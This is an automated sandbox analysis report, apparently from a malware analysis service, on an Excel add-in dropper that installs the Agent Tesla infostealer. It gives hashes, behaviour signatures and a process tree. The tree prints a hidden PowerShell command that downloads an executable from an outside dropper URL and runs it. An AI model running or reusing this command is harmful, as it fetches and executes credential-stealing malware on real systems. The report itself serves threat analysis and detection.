Analysis

  • max time kernel
    147s
  • max time network
    25s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    09-07-2020 04:22

General

  • Target

    16015107.xlam

  • Size

    12KB

  • MD5

    db3b7d4cfb134c5ad4c74891e23c06e4

  • SHA1

    b78856ac0597b12d2befe6ebb055082632529a71

  • SHA256

    2e6f88c4dc2322c385d506a81b5127f4361cb824389315d4dbb100e959c8fbc0

  • SHA512

    2266ab432712b2a9d4a744bcf0ac852e5573a00fe114c5378bd1e8a87355a6038efc32c38738ea7edb64eb8236458dbfdbc4cadfa84ccef196c20a8f0b153a00

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://shopcart.indbytes.com/cig/16015107.jpg

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\16015107.xlam
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:904
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/16015107.jpg',$env:Temp+'\fdhe.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\fdhe.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/16015107.jpg',$env:Temp+'\fdhe.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\fdhe.exe')
        3⤵
        • Blacklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:324
        • C:\Users\Admin\AppData\Local\Temp\fdhe.exe
          "C:\Users\Admin\AppData\Local\Temp\fdhe.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:1228

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\fdhe.exe

  • C:\Users\Admin\AppData\Local\Temp\fdhe.exe

  • memory/240-3-0x0000000000000000-mapping.dmp

  • memory/324-4-0x0000000000000000-mapping.dmp

  • memory/904-0-0x000000000046A000-0x000000000046C000-memory.dmp

    Filesize

    8KB

  • memory/904-1-0x0000000004640000-0x0000000004740000-memory.dmp

    Filesize

    1024KB

  • memory/904-2-0x0000000004640000-0x0000000004740000-memory.dmp

    Filesize

    1024KB

  • memory/1228-5-0x0000000000000000-mapping.dmp

  • memory/1228-8-0x0000000006A60000-0x0000000006AA1000-memory.dmp

    Filesize

    260KB

  • memory/1228-9-0x000000001331B000-0x000000001335C000-memory.dmp

    Filesize

    260KB